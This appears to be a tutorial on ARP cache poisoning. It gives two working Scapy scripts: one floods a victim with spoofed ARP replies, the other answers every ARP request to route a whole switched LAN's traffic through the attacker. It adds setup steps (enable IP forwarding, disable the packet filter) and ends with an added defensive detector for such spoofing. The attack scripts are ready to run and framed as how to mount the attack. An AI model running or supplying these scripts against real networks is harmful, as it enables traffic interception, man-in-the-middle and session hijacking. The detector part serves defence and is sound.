ARP cache Poisoning

What is ARP cache Poisoning?

In computer networking, ARP spoofing, also known as ARP cache poisoning or ARP poison
routing, is a technique by which an attacker sends (spoofed) Address Resolution
Protocol (ARP) messages onto a local area network. Generally, the aim is to associate
the attacker's MAC address with the IP address of another host, such as the default
gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify
the traffic, or stop all traffic. Often the attack is used as an opening for other
attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol,
and it is limited to local network segments, because ARP is never routed.

How to create an attack using Scapy?

Code Part:

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) < 3:
    print("usage: " + sys.argv[0] + " target_ip fake_ip")
    sys.exit(1)

iface = "eth0"
target_ip = sys.argv[1]   # victim whose ARP cache gets poisoned
fake_ip = sys.argv[2]     # IP address we claim to own (e.g. the gateway)

# Unsolicited ARP reply: "fake_ip is-at <our MAC>", addressed to target_ip.
# hwsrc defaults to the MAC of the sending interface.
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp

# Resend every 10 seconds so the poisoned cache entry does not expire.
while True:
    sendp(packet, iface=iface)
    time.sleep(10)

How did it work?

With the help of Scapy we construct a packet called packet consisting of an
Ether() and an ARP() header. In the ARP header we set the IP address of the
victim (target_ip) and the IP address whose connections we would like to hijack
(fake_ip). As the last parameter we define the op-code is-at, which declares the
packet as an ARP response. Afterwards we use the function sendp() and not the
function send(), because the packet should be sent on layer 2. The function
send() sends packets on layer 3.

One last thing to remember: enable IP forwarding, otherwise your host would
block the connection of the victim.

sysctl net.ipv4.ip_forward=1

Don't forget to check the settings of your packet filter like iptables, pf or
ipfw, or just disable it.

Man in the middle

A computer that wants to learn the MAC address belonging to an IP address asks
with an ARP request. The program below waits for ARP requests and sends a spoofed
reply to every received request. In a switched environment this will result in
every connection flowing over the computer of the attacker, because every ARP cache
will hold the attacker's MAC for every IP address. This solution is more elegant and
not as noisy as the one before, but still quite easy to detect for a trained admin.

Code Part:

import sys
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 2:
    print("usage: " + sys.argv[0] + " iface")
    sys.exit(0)

def arp_poison_callback(packet):
    # Got ARP request (op 1 = who-has)?
    if packet[ARP].op == 1:
        # Answer the requester directly, claiming the requested IP is at our MAC
        # (hwsrc defaults to the MAC of the sending interface).
        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
        answer[ARP].op = "is-at"
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst
        answer[ARP].pdst = packet[ARP].psrc

        print("Fooling " + packet[ARP].psrc + " that " +
              packet[ARP].pdst + " is me")
        sendp(answer, iface=sys.argv[1])

# Sniff only ARP frames and hand each one to the callback without storing it.
sniff(prn=arp_poison_callback,
      filter="arp",
      iface=sys.argv[1],
      store=0)
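The detection a trained admin could run against both scripts above, as an added example that is not part of the original post: it consumes the op, psrc, hwsrc, pdst and hwdst fields a sniff callback would read from packet[ARP] (the class and constant names and the sample trace are constructed for this example) and flags replies nobody asked for as well as an IP whose MAC changes between replies, which catches both the periodic sendp loop and the reply-to-every-request script.

```python
from collections import deque

ARP_REQUEST = 1  # Scapy op "who-has"
ARP_REPLY = 2    # Scapy op "is-at"

class ArpSpoofDetector:
    """Flags ARP replies nobody requested and replies that move an IP to a new MAC."""
    def __init__(self, window=64):
        self.bindings = {}                   # psrc -> hwsrc learned from replies
        self.pending = deque(maxlen=window)  # (pdst, requester MAC) of recent requests

    def observe(self, op, psrc, hwsrc, pdst, hwdst):
        """Feed the ARP fields of one frame; return a list of alert strings."""
        alerts = []
        if op == ARP_REQUEST:
            self.pending.append((pdst, hwsrc))  # hwsrc asked who-has pdst
            return alerts
        if op != ARP_REPLY:
            return alerts
        # A legitimate reply answers a request for psrc that hwdst sent.
        if (psrc, hwdst) in self.pending:
            self.pending.remove((psrc, hwdst))
        else:
            # Gratuitous ARP at boot also lands here, so on its own this is a
            # weak signal; the sendp loop above produces one every 10 seconds.
            alerts.append("unsolicited reply: %s is-at %s" % (psrc, hwsrc))
        old = self.bindings.get(psrc)
        if old is not None and old != hwsrc:
            # Strong signal: the real host and the spoofer both answered.
            alerts.append("binding change: %s moved from %s to %s" % (psrc, old, hwsrc))
        self.bindings[psrc] = hwsrc
        return alerts

def scan(trace):
    det = ArpSpoofDetector()
    alerts = []
    for fields in trace:
        alerts.extend(det.observe(*fields))
    return alerts

# Constructed sample trace (not a real capture): client asks for the gateway, gateway
# answers, a spoofed reply like the callback's follows, then one like the sendp loop's.
GW, CLIENT_MAC = "10.0.0.1", "aa:aa:aa:aa:aa:05"
GW_MAC, SPOOF_MAC = "aa:aa:aa:aa:aa:01", "02:00:00:00:be:ef"
SAMPLE_TRACE = [
    (ARP_REQUEST, "10.0.0.5", CLIENT_MAC, GW, "ff:ff:ff:ff:ff:ff"),
    (ARP_REPLY, GW, GW_MAC, "10.0.0.5", CLIENT_MAC),
    (ARP_REPLY, GW, SPOOF_MAC, "10.0.0.5", CLIENT_MAC),
    (ARP_REPLY, GW, SPOOF_MAC, "10.0.0.5", "00:00:00:00:00:00"),
]
```

Running scan(SAMPLE_TRACE) yields three alerts; the binding-change alert is the one to act on, since it fires whichever of the real host and the spoofer answers first.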
